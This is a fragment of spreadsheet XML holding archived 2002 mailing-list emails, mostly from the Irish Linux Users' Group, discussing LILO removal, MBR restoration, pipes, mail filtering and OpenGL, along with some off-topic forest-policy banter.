cheers! 	-blf- p.s.  b.t.w., you almost certainly want to be using a UTF-8       locale.  if RH 7.3 is the so-called "limbo" release,       then you may quite possibility be using one by default. -- Â«How many surrealists does it take to    |  Brian Foster    Dublin, Ireland  change a lightbulb?  Three.  One calms  |  e-mail: blf@utvinternet.ie  the warthog, and two fill the bathtub   |  mobile: (+353 or 0)86 854 9268  with brightly-coloured machine tools.Â»  |  [URL]http://www.blf.utvinternet.ie[/URL]     Stop E$$o (ExxonMobile):  Â«Whatever you do, don't buy Esso --- they      don't give a damn about global warming.Â»    [URL]http://www.stopesso.com[/URL]      Supported by Greenpeace, Friends of the Earth, and numerous others... --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.cl.cam.ac.uk http://mail.nl.linux.org http://www.blf.utvinternet.ie http://www.stopesso.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: Liam Bedford &lt;lbedford@lbedford.org&gt;\nFrom: SoloCDM &lt;deedsmis@aculink.net&gt;\nDate: Wed, 31 Jul 2002 18:33:58 -0600</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 18:33:58 -0600</t>
  </si>
  <si>
    <t>SoloCDM &lt;deedsmis@aculink.net&gt;</t>
  </si>
  <si>
    <t>Liam Bedford &lt;lbedford@lbedford.org&gt;</t>
  </si>
  <si>
    <t>[ILUG] Re: removing lilo</t>
  </si>
  <si>
    <t>Liam Bedford stated the following:\n&gt; \n&gt; On Wed, 31 Jul 2002 10:48:16 -0600 SoloCDM claiming to think:\n&gt; \n&gt; &gt; "Hunt, Bryan" stated the following:\n&gt; \n&gt; &gt;&gt; you need to do a "fdisk /mbr" from a bootable windoze floppy\n&gt; &gt;&gt; alternatively boot from linux boot disk and do fdisk, delete all\n&gt; &gt;&gt; partitions.\n&gt; \n&gt; &gt; I need to ask a question concerning this issue.\n&gt; \n&gt; &gt; What if I don't want to get rid of the MBR -- it will destroy the\n&gt; &gt; OS on that drive.  How do I remove lilo without the above fdisk\n&gt; &gt; procedure?\n&gt; \n&gt; fdisk /mbr will restore a dos MBR.. it'll leave the partitions alone.\n&gt; \n&gt; linux fdisk and deleting all partitions will actually leave LILO in\n&gt; the MBR though.\n\nWhile I am in Linux, the following message is the output when I\nexecute fdisk /mbr, even though the drive is in read and write mode:\n\nUnable to open /mbr\n\nThe mbr is on a separate drive -- not related to the Linux drive.\n\n-- \nNote: When you reply to this message, please include the mailing\n      list and/or newsgroup address and my email address in To:\n\n*********************************************************************\nSigned,\nSoloCDM\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: FoRK &lt;FoRK@xent.com&gt;\nFrom: Andy Armstrong &lt;andy@tagish.com&gt;\nDate: Wed, 31 Jul 2002 18:20:54 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 18:20:54 +0100</t>
  </si>
  <si>
    <t>Andy Armstrong &lt;andy@tagish.com&gt;</t>
  </si>
  <si>
    <t>FoRK &lt;FoRK@xent.com&gt;</t>
  </si>
  <si>
    <t>Bike Bits</t>
  </si>
  <si>
    <t>What a fantastically bizarre device:\n   [URL]http://www.conferencebike.com[/URL]\n\nAnyone seen one in the flesh?\n\n-- \nAndy Armstrong, [URL]http://www.tagish.co.uk[/URL]\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.conferencebike.com http://www.tagish.co.uk http://xent.com</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: CDale &lt;cdale@techmonkeys.net&gt;\nDate: Wed, 31 Jul 2002 18:08:10 -0500 (CDT)</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 18:08:10 -0500 (CDT)</t>
  </si>
  <si>
    <t>Re: What's cool about doing nothing</t>
  </si>
  <si>
    <t>I think there's a link to all the details on welcomehome.org, but \nbasically it was told to me this way: govt wanted land in arizona or someplace, \nindians said no, govt said 'okay, u know that land in MS u want?  we will \nfux0r it, then.'  indians still said no, govt fux0red it.\nC\n\nOn Wed, 31 Jul 2002, Elias Sinderson wrote:\n\n&gt; Heh. Never mind the perfectly good desert in the southwest, right? Or is \n&gt; that area too hot for desert warfare training? I'll never understand.\n&gt; \n&gt; E\n&gt; \n&gt; CDale wrote:\n&gt; \n&gt; &gt;Okay, I'll ammend that to LIVE OLD tree saving, like the thousands of \n&gt; &gt;acres of virgin pine forest that was razed here in MS so that our military \n&gt; &gt;can practice desert warfare?  Fought it for years, lost, now there is a \n&gt; &gt;stand of trees up and down Hwy 49 that's supposed to try to hide the fact \n&gt; &gt;that a huge portion of the Desoto Ntl. Forest is gone.\n&gt; &gt;\n&gt; \n&gt; \n&gt; [URL]http://xent.com[/URL]\n&gt; \n\n-- \n"My theology, briefly, is that the universe was dictated but not\n          signed."  (Christopher Morley) \n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://xent.com http://xent.com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Wed, 31 Jul 2002 18:01:30 +0200</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 18:01:30 +0200</t>
  </si>
  <si>
    <t>Once upon a time, Doug wrote : &gt; Maybe I'm just blind, but I've been poking through the &gt; archives of this list trying to find 1) what &gt; up-to-date KDE3 repositories are available and 2) &gt; where all the Xine skins went. For that n2, it's simple : They've been pulled out from the upstream xine source. I guess I should make a "xine-skins" package if there is enough demand for it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ilug@linux.ie\nFrom: Conor Daly &lt;conor.daly@oceanfree.net&gt;\nDate: Wed, 31 Jul 2002 17:57:01 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 17:57:01 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] Installing lilo on another disk.</t>
  </si>
  <si>
    <t>On Tue, Jul 30, 2002 at 03:47:40PM +0100 or so it is rumoured hereabouts,  Niall O Broin thought: &gt; I'm installing warm standby disks on a number of boxes. These disks will be &gt; the same size (sometimes bigger) than the main disk. The idea is that every &gt; night I'll rsync the partitions on the main disk to the standby disk so that &gt; in the case of disaster, the first port of call, before the tapes, is the &gt; standby disk. (We did consider running Linux md RAID on the disks but RAID &gt; gives you no protection against slips of the finger) &gt;  &gt; So, in the event of finger slips we can mount the relevant partition and &gt; retrieve the banjaxed file. In the case of a disk crash, the plan is that &gt; we'll put the standby disk in place of the main disk and the workstation &gt; will be back up ASAP. Then we can deal with replacing the disk without the &gt; pressure of a broken box on our back. &gt;  &gt; However, I'm stumped as to how to install LILO on the backup disk. Let's say &gt; the master disk is /dev/hda and the backup disk is /dev/hdb. lilo.conf &gt; currently looks like this: &gt;  &gt; boot    = /dev/hda &gt; change-rules &gt; reset &gt; read-only &gt; menu-scheme = Wg:kw:Wg:Wg &gt; lba32 &gt; prompt &gt; timeout = 80 &gt; message = /boot/message &gt;  &gt;   image  = /boot/vmlinuz &gt;   label  = linux &gt;   root   = /dev/hda3 &gt;   vga    = 791 &gt;   initrd = /boot/initrd &gt;  &gt;  &gt;  &gt; There are a couple more boot stanzas, but they're not germane. As you can &gt; see, / is on /dev/hda3 and /boot is on /dev/hda1. So if for instance I had &gt; booted from a CD and wanted to re-install LILO on this disk I'd do something &gt; like &gt;  &gt; mount /dev/hda3 /mnt &gt; mount /dev/hda1 /mnt/boot &gt; lilo -r /mnt &gt;  &gt; which is OK because I'm installing lilo on /dev/hda and I want it to boot &gt; from /dev/hda so it'll plug in all the right numbers. &gt;  &gt; However, in the case of the standby disk, I'll have to do something like &gt;  &gt; mount /dev/hdb3 /mnt &gt; mount /dev/hdb1 /mnt/boot &gt; lilo -r /mnt &gt;  &gt; But I'm obviously going to have to do something different here because I &gt; want to install onto /dev/hdb in such a way that the disk will boot when it &gt; becomes /dev/hda after a disaster (like the one I had this morning :-( - &gt; shutting the stable door was on the to-do list, but the bloody horse decided &gt; to do a bunk early). The machine already has its spare disk - just hadn't &gt; yet been used :-( &gt;  &gt; I thought perhaps I should just do   lilo -b /dev/hdb -r /mnt  but I think &gt; that -b is analogous to the boot keyword in lilo.conf. Or will this just &gt; work automagically ?  i.e. boot = /dev/hda tells lilo what numbers to poke &gt; where, and it figures out where the disk is from the -r ?  from the Hard Disk Upgrade Mini HOWTO : 8. Prepare LILO to boot the new disk    (Thanks to Rick Masters for helping with this.)    We're  assuming  that LILO is installed on the hard disk's Master Boot    Record (MBR); this seems to be the most common configuration. You want    to  install  LILO  on  what's  presently the second hard disk but will    become the first hard disk.    Edit the file /new-disk/etc/lilo.conf as follows:         disk=/dev/hdb bios=0x80       # Tell LILO to treat the second                                       # disk as if it were the first                                       # disk (BIOS ID 0x80).         boot=/dev/hdb                 # Install LILO on second hard                                       # disk.         map=/new-disk/boot/map        # Location of "map file".         install=/new-disk/boot/boot.b # File to copy to hard disk's                                       # boot sector.         prompt                        # Have LILO show "LILO boot:"                                       # prompt.         timeout=50                    # Boot default system after 5                                       # seconds. (Value is in tenths of                                       # seconds.)         image=/new-disk/boot/vmlinuz  # Location of Linux kernel. The                                       # actual name may include a version                                       # number, for example                                       # "vmlinuz-2.0.35".             label=linux               # Label for Linux system.             root=/dev/hda1            # Location of root partition on                                       # new hard disk. Modify this as                                       # appropriate for your system.                                       # Note that you must use the name                                       # of the future location, once the                                       # old disk has been removed.             read-only                 # Mount partition read-only at                                       # first, to run fsck. Conor PS.  Um, what does  &gt; menu-scheme = Wg:kw:Wg:Wg do? --  Conor Daly  Domestic Sysadmin :-) --------------------- Faenor.cod.ie   6:04pm  up 69 days,  3:22,  0 users,  load average: 0.00, 0.00, 0.00 Hobbiton.cod.ie   5:50pm  up 12 days, 27 min,  1 user,  load average: 0.00, 0.00, 0.00 --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: deedsmis@aculink.net, ilug@linux.ie\nFrom: Paul Askins &lt;paul.askins@analog.com&gt;\nDate: Wed, 31 Jul 2002 17:34:40 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 17:34:40 +0100</t>
  </si>
  <si>
    <t>Paul Askins &lt;paul.askins@analog.com&gt;</t>
  </si>
  <si>
    <t>deedsmis@aculink.net, ilug@linux.ie</t>
  </si>
  <si>
    <t>Re: [ILUG] Re: removing lilo</t>
  </si>
  <si>
    <t>"fdisk /mbr" will not destroy the OS, it will simply restore the windows mbr as it was.  Running fdisk and deleting a partition would however destroy the OS (bu even then only if you format the disc afterwards). Sure wasn't it SoloCDM   sometime around Wed, 31 Jul 2002 10:48:16 -0600 said:   &gt; I need to ask a question concerning this issue. &gt;  &gt; What if I don't want to get rid of the MBR -- it will destroy the OS &gt; on that drive.  How do I remove lilo without the above fdisk &gt; procedure? &gt;  --  Paul Askins &lt;:) Email:  Paul Askins  Behind every great man, there is a woman -- urging him on. 		-- Harry Mudd, "I, Mudd", stardate 4513.3 --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: deedsmis@aculink.net, ilug@linux.ie\nFrom: Liam Bedford &lt;lbedford@lbedford.org&gt;\nDate: Wed, 31 Jul 2002 17:34:14 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 17:34:14 +0100</t>
  </si>
  <si>
    <t>On Wed, 31 Jul 2002 10:48:16 -0600\nSoloCDM claiming to think:\n\n&gt; "Hunt, Bryan" stated the following:\n&gt; &gt; \n&gt; &gt; you need to do a "fdisk /mbr" from a bootable windoze floppy\n&gt; &gt; alternatively boot from linux boot disk and do fdisk, delete all partitions.\n&gt; \n&gt; I need to ask a question concerning this issue.\n&gt; \n&gt; What if I don't want to get rid of the MBR -- it will destroy the OS\n&gt; on that drive.  How do I remove lilo without the above fdisk\n&gt; procedure?\n&gt; \nfdisk /mbr will restore a dos MBR.. it'll leave the partitions alone.\n\nlinux fdisk and deleting all partitions will actually leave LILO in the\nMBR though.\n\nL.\n-- \n     dBP   dBBBBb | If you're looking at me to be an accountant\n              dBP | Then you will look but you will never see\n   dBP    dBBBK'  | If you're looking at me to start having babies\n  dBP    dB' db   | Then you can wish because I'm not here to fool around\n dBBBBP dBBBBP'   | Belle &amp; Sebastian (Family Tree)\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Steven Champeon &lt;schampeo@hesketh.com&gt;\nDate: Wed, 31 Jul 2002 17:31:05 -0400</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 17:31:05 -0400</t>
  </si>
  <si>
    <t>Steven Champeon &lt;schampeo@hesketh.com&gt;</t>
  </si>
  <si>
    <t>[Razor-users] can't call method "log" issue - solution</t>
  </si>
  <si>
    <t>I see that Robert S. Wojciechowski Jr. posted about this issue on 7/26,\nbut I don't see any responses. I get that error when calling razor-report\nfrom a sendmail alias, but not from the command line as a different user.\nThe way I solved it was to run \n\nrazor-admin -create\n\nand\n\nrazor-admin -discover\n\nwith a -home argument set to the global /etc/razor directory, which is\nexplicitly specified in the args to the alias pipe.\n\nThe manual page, which suggests that /etc/razor/razor-agent.conf will be\nloaded first, does not also say that razor-admin will then create a\n.razor directory in the user's home directory if it does not exist\n(although this /is/ pointed out in the razor-agents(1) page. This may\nlead to some minor confusion if the user is trying to set the discovery\nand other defaults for a default (e.g., /etc/razor) install. The\nworkaround is as I say above, namely, explicitly specify the path to\nrazorhome on the command line, e.g.\n\nrazor-admin -home=/etc/razor -create\nrazor-admin -home=/etc/razor -discover\n\nhth,\nSteve\n\n-- \nhesketh.com/inc. v: (919) 834-2552 f: (919) 834-2554 w: [URL]http://hesketh.com[/URL]\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http://hesketh.com http://seeker.dice.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: irish linux users group &lt;ilug@linux.ie&gt;\nFrom: Gavin McCullagh &lt;ilug_gmc@fiachra.ucd.ie&gt;\nDate: Wed, 31 Jul 2002 17:26:11 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 17:26:11 +0100</t>
  </si>
  <si>
    <t>irish linux users group &lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] Re: Mutt + Outbox</t>
  </si>
  <si>
    <t>On Sat, 27 Jul 2002, kevin lyda wrote: &gt; saw this on mutt users.  might be a handy trick for those of with &gt; hyperactive archiving genes...  :) &gt;  &gt; this might work better in this long run though: &gt;  &gt;    set record='~/Mail/outbox-`date "+%Y-%m"`' A nice followon of this for the obsessive archiver is: Procmail: .procmail/rc.mail 	 	:0: 	* ^Subject.*\[ILUG\] 	:ilug-`date "+%m-%Y"` 	 and Mutt: .muttrc: 	mailboxes =ilug-`date "+%m-%Y"`  does mean threads get broken at the start of the month though :( Gavin --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Conor Daly &lt;conor.daly@oceanfree.net&gt;\nDate: Wed, 31 Jul 2002 17:24:34 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 17:24:34 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] removing lilo</t>
  </si>
  <si>
    <t>On Wed, Jul 31, 2002 at 02:40:26PM +0100 or so it is rumoured hereabouts,  Liam Bedford thought: &gt; On Wed, 31 Jul 2002 14:30:01 +0100 &gt; jac1 claiming to think: &gt;  &gt; &gt; hi, &gt; &gt; i recently had to wipe linux from my pc but forgot to restore the original &gt; &gt; MBR (NT). Anyone know how i can do this? linux is entirely gone and no boot &gt; &gt; floppy. formatting the entire disk doesn't do it either. &gt; &gt;  &gt; boot from dos and fdisk /mbr? &gt; boot from an NT CD, choose repair, and make it check the mbr                              ^^^^^^ Nice how NT "repair"s a hard disk by removing other OSs.  Could we call it that on Linux install disks too? Conor  --  Conor Daly  Domestic Sysadmin :-) --------------------- Faenor.cod.ie   5:37pm  up 69 days,  2:54,  0 users,  load average: 0.08, 0.02, 0.01 Hobbiton.cod.ie   5:22pm  up 12 days, 0 min,  1 user,  load average: 0.03, 0.03, 0.00 --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'jac1'" &lt;jac1@student.cs.ucc.ie&gt;, ilug@linux.ie\nFrom: "Wynne, Conor" &lt;conor_wynne@maxtor.com&gt;\nDate: Wed, 31 Jul 2002 17:08:18 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 17:08:18 +0100</t>
  </si>
  <si>
    <t>"Wynne, Conor" &lt;conor_wynne@maxtor.com&gt;</t>
  </si>
  <si>
    <t>"'jac1'" &lt;jac1@student.cs.ucc.ie&gt;, ilug@linux.ie</t>
  </si>
  <si>
    <t>RE: [ILUG] removing lilo</t>
  </si>
  <si>
    <t>"Good" ol dos fdisk /mbr should do the twick\n\nBut...but... Jac, your a big linux head....why?\n\nregards,\nCW\n\n------------\nhi,\ni recently had to wipe linux from my pc but forgot to restore the original\nMBR (NT). Anyone know how i can do this? linux is entirely gone and no boot\nfloppy. formatting the entire disk doesn't do it either.\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: iiu-admin@taint.org\nFrom: iiu-admin@taint.org\nDate: Wed, 31 Jul 2002 17:08:17 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 17:08:17 +0100</t>
  </si>
  <si>
    <t>iiu-admin@taint.org</t>
  </si>
  <si>
    <t>IIU post from emailharvest@email.com requires approval</t>
  </si>
  <si>
    <t>As list administrator, your authorization is requested for the\nfollowing mailing list posting:\n\n    List:    IIU@iiu.taint.org\n    From:    emailharvest@email.com\n    Subject: ADV: Harvest lots of E-mail addresses quickly !\n    Reason:  Post by non-member to a members-only list\n\nAt your convenience, visit:\n\n    [URL]http://iiu.taint.org[/URL]\n        \nto approve or deny the request.</t>
  </si>
  <si>
    <t>http://iiu.taint.org</t>
  </si>
  <si>
    <t>To: Marty Halvorson &lt;martyh@nmcourts.com&gt;\nFrom: CDale &lt;cdale@techmonkeys.net&gt;\nDate: Wed, 31 Jul 2002 17:08:07 -0500 (CDT)</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 17:08:07 -0500 (CDT)</t>
  </si>
  <si>
    <t>Marty Halvorson &lt;martyh@nmcourts.com&gt;</t>
  </si>
  <si>
    <t>Okay, I'll ammend that to LIVE OLD tree saving, like the thousands of \nacres of virgin pine forest that was razed here in MS so that our military \ncan practice desert warfare?  Fought it for years, lost, now there is a \nstand of trees up and down Hwy 49 that's supposed to try to hide the fact \nthat a huge portion of the Desoto Ntl. Forest is gone.\nC\n\nOn Wed, 31 Jul 2002, Marty Halvorson wrote:\n\n&gt;  &gt; So my thanks to those who are active in:\n&gt;  &gt; tree saving (okay, I help some here, but never enough)\n&gt;  &gt; drug rehabilitation (-smirk-  shut up, I'm serious)\n&gt;  &gt; keeping some of our freedoms intact (see tree saving)\n&gt;  &gt; health care reform\n&gt;  &gt; puppy dog rescue\n&gt;  &gt; education (move this one to the top of the list)\n&gt;  &gt; etc (lots and lots of etc)\n&gt; \n&gt; I can agree with most of this list except tree saving.\n&gt; \n&gt; Please understand, I'm in favor of forests.  I'm not in favor of messing \n&gt; with natural processes that forests and trees have evolved over millions of \n&gt; years.\n&gt; \n&gt; Every time I look toward the west from my house I see the result of overly \n&gt; aggressive tree saving.  The Cerro Grande fire that destroyed many (200+) \n&gt; houses and an area bigger than Boston.\n&gt; \n&gt; The Santa Fe watershed, which has as many as 1200 trees per acre in an area \n&gt; that if left to nature would have 30-60 trees per acre.  When the Forest \n&gt; Service attempted to cull trees in their part of the watershed, the tree \n&gt; lovers stopped the program with law suits.\n&gt; \n&gt; A number of other projects have been stopped by similar suits.  For \n&gt; example, a fire south of Los Alamos that left many usable, but partially \n&gt; burned, trees standing.  The Forest Service started a project to allow \n&gt; loggers to take those trees.  Hah!  The tree lovers stopped that.  Can't \n&gt; have the loggers go into the forest even if the trees being taken are \n&gt; already burned and the roads necessary to get to the trees are already built.\n&gt; \n&gt; A Forest Service official has stated flat out that the tree lovers need to \n&gt; understand their responsibility in contributing to the number of \n&gt; uncontrollable (i.e., crown fires caused by very dense tree stands and \n&gt; under growth) fires by their suits to stop any tree removal from the \n&gt; forests managed by the Forest Service.\n&gt; \n&gt; I am writing having survived another season of forest fires.  One that saw \n&gt; many more fires than normal because of the severe drought occurring here in \n&gt; the Southwest (even though there are still quite a few fires burning).\n&gt; \n&gt; Peace,\n&gt; \n&gt; Marty Halvorson\n&gt; marty@halvorson.us\n&gt; \n&gt; [URL]http://xent.com[/URL]\n&gt; \n\n-- \n"My theology, briefly, is that the universe was dictated but not\n          signed."  (Christopher Morley) \n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Irish Linux Users Group &lt;ilug@linux.ie&gt;\nFrom: Brian Foster &lt;blf@utvinternet.ie&gt;\nDate: Wed, 31 Jul 2002 16:59:43 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 16:59:43 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] Piping to multiple processes (which might die)?</t>
  </si>
  <si>
    <t>| Date: Wed, 31 Jul 2002 15:13:23 +0100   | From: Ronan Cunniffe    |    | Um, my test was to tee to a fifo I didn't read from... resulting   | in the other reader hanging around forever.... not realising that   | never-opened-for-reading and opened-and-later-closed might be   | different.  ah!  yes!  this is one of those gotchas everyone stumbles  over.  the writer of a never-opened-for-reading pipe will  quickly block (as soon as the pipe's limited buffer fills  up).  but the writer of opened-and-later-closed pipe gets  an EPIPE error (and the usually-terminal SIGPIPE signal).  the typical stumble is someone creates an anonymous pipe  with pipe(2), but forgets to close(2) the reader's fd in  the writer-process (or visa-versa) .... and then wonders  why the real reader never sees an EOF and/or the writer  is never gets an EPIPE/SIGPIPE.  various FAQs and many  books probably discuss this topic in depth to the death.   |             Sensible behaviour has now been observed.  good!  and good luck. cheers, 	-blf- -- Â«How many surrealists does it take to    |  Brian Foster    Dublin, Ireland  change a lightbulb?  Three.  One calms  |  e-mail: blf@utvinternet.ie  the warthog, and two fill the bathtub   |  mobile: (+353 or 0)86 854 9268  with brightly-coloured machine tools.Â»  |  [URL]http://www.blf.utvinternet.ie[/URL]     Stop E$$o (ExxonMobile):  Â«Whatever you do, don't buy Esso --- they      don't give a damn about global warming.Â»    [URL]http://www.stopesso.com[/URL]      Supported by Greenpeace, Friends of the Earth, and numerous others... --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.blf.utvinternet.ie http://www.stopesso.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "John Reilly" &lt;jr@inconspicuous.org&gt;\nDate: Wed, 31 Jul 2002 16:53:15 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 16:53:15 +0100</t>
  </si>
  <si>
    <t>"John Reilly" &lt;jr@inconspicuous.org&gt;</t>
  </si>
  <si>
    <t>Lacking a DOS boot disk, I just looked for a different way to do it yesterday.  You can use     lilo -u /dev/hda Sourced via google search "remove lilo" which returned [URL]http://support.microsoft.com[/URL];EN-US;q315224&amp; Much handier if you only have tomsrtbt or something similar. jr ----- Original Message ----- From: "jac1"  To:  Sent: Wednesday, July 31, 2002 2:30 PM Subject: [ILUG] removing lilo &gt; hi, &gt; i recently had to wipe linux from my pc but forgot to restore the original &gt; MBR (NT). Anyone know how i can do this? linux is entirely gone and no boot &gt; floppy. formatting the entire disk doesn't do it either. &gt; &gt; &gt; &gt; -- &gt; Irish Linux Users' Group: ilug@linux.ie &gt; [URL]http://www.linux.ie[/URL] for (un)subscription information. &gt; List maintainer: listmaster@linux.ie --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://support.microsoft.com http://www.linux.ie http://www.linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Vincent Cunniffe &lt;vincent@cunniffe.net&gt;\nDate: Wed, 31 Jul 2002 16:37:42 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 16:37:42 +0100</t>
  </si>
  <si>
    <t>Vincent Cunniffe &lt;vincent@cunniffe.net&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] sysctl.conf</t>
  </si>
  <si>
    <t>John P. Looney wrote:\n&gt;  OK, I guess that sysctl.conf is the best way of setting \n&gt; \n&gt;     /proc/sys/fs/file-max\n\ncat 20480 &gt; /proc/sys/fs/file-max\n\nta dah...\n\nVin\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: John Hinsley &lt;johnhinsley@blueyonder.co.uk&gt;\nDate: Wed, 31 Jul 2002 16:35:18 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 16:35:18 +0100</t>
  </si>
  <si>
    <t>John Hinsley &lt;johnhinsley@blueyonder.co.uk&gt;</t>
  </si>
  <si>
    <t>Re: OpenGL</t>
  </si>
  <si>
    <t>On Wednesday 31 Jul 2002 9:53 am, Ralf Ertzinger wrote: &gt; Hi. &gt; &gt; John Hinsley  wrote: &gt; &gt; Querying the rpm database for OpenGL gets me nowhere fast. Can anyone &gt; &gt; point me in the right direction? What, in RedHat, provides OpenGL? &gt; &gt; The X server itself does (or does not, depending on your driver). There &gt; is a software fallback called Mesa compiled in the X server, which &gt; is used as a fallback. So, if you have installed X, you have OpenGL. &gt; Try the glxinfo command to see the capabilities provided by your &gt; X system. I get: [john@localhost john]$ glxinfo name of display: :0.0 display: :0  screen: 0 direct rendering: Yes server glx vendor string: NVIDIA Corporation server glx version string: 1.2 server glx extensions:     GLX_EXT_visual_info, GLX_EXT_visual_rating, GLX_SGIX_fbconfig,     GLX_SGIX_pbuffer client glx vendor string: NVIDIA Corporation client glx version string: 1.2 client glx extensions:     GLX_ARB_get_proc_address, GLX_ARB_multisample, GLX_EXT_visual_info,     GLX_EXT_visual_rating, GLX_EXT_import_context, GLX_SGI_video_sync,     GLX_SGIX_swap_group, GLX_SGIX_swap_barrier, GLX_SGIX_fbconfig,     GLX_SGIX_pbuffer GLX extensions:     GLX_EXT_visual_info, GLX_EXT_visual_rating, GLX_SGIX_fbconfig,     GLX_SGIX_pbuffer, GLX_ARB_get_proc_address OpenGL vendor string: NVIDIA Corporation OpenGL renderer string: RIVA TNT2/AGP OpenGL version string: 1.3.1 NVIDIA 29.60 OpenGL extensions:     GL_ARB_imaging, GL_ARB_multitexture, GL_ARB_texture_env_add,     GL_ARB_transpose_matrix, GL_EXT_abgr, GL_EXT_bgra,     GL_EXT_compiled_vertex_array, GL_EXT_draw_range_elements,     GL_EXT_fog_coord, GL_EXT_multi_draw_arrays, GL_EXT_packed_pixels,     GL_EXT_point_parameters, GL_EXT_rescale_normal, GL_EXT_secondary_color,     GL_EXT_separate_specular_color, GL_EXT_stencil_wrap,     GL_EXT_texture_edge_clamp, GL_EXT_texture_env_add,     GL_EXT_texture_env_combine, GL_EXT_texture_lod_bias,     GL_EXT_texture_object, GL_EXT_vertex_array, GL_EXT_vertex_weighting,     GL_IBM_texture_mirrored_repeat, GL_KTX_buffer_region, GL_NV_blend_square,     GL_NV_evaluators, GL_NV_fog_distance, GL_NV_packed_depth_stencil,     GL_NV_texgen_reflection, GL_NV_texture_env_combine4 glu version: 1.3 glu extensions:     GLU_EXT_nurbs_tessellator, GLU_EXT_object_space_tess    visual  x  bf lv rg d st colorbuffer ax dp st accumbuffer  ms  cav  id dep cl sp sz l  ci b ro  r  g  b  a bf th cl  r  g  b  a ns b eat ---------------------------------------------------------------------- 0x21 16 tc  0 16  0 r  y  .  5  6  5  0  0 16  0 16 16 16 16  0 0 None 0x22 16 dc  0 16  0 r  y  .  5  6  5  0  0 16  0 16 16 16 16  0 0 None 0x23 16 tc  0 16  0 r  .  .  5  6  5  0  0 16  0 16 16 16 16  0 0 None 0x24 16 dc  0 16  0 r  .  .  5  6  5  0  0 16  0 16 16 16 16  0 0 None So, I *do* have OpenGL, thanks all. Problem is that I can't find an rpm of plib which will install (or recognise  that I have open GL). I guess I'll have to try and do that from source,  unless anyone has any ideas? Cheers John John But I can't seem to find a version  _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Mark Baker &lt;distobj@acm.org&gt;\nDate: Wed, 31 Jul 2002 16:30:42 -0400</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 16:30:42 -0400</t>
  </si>
  <si>
    <t>Mark Baker &lt;distobj@acm.org&gt;</t>
  </si>
  <si>
    <t>Clark on Munchkins</t>
  </si>
  <si>
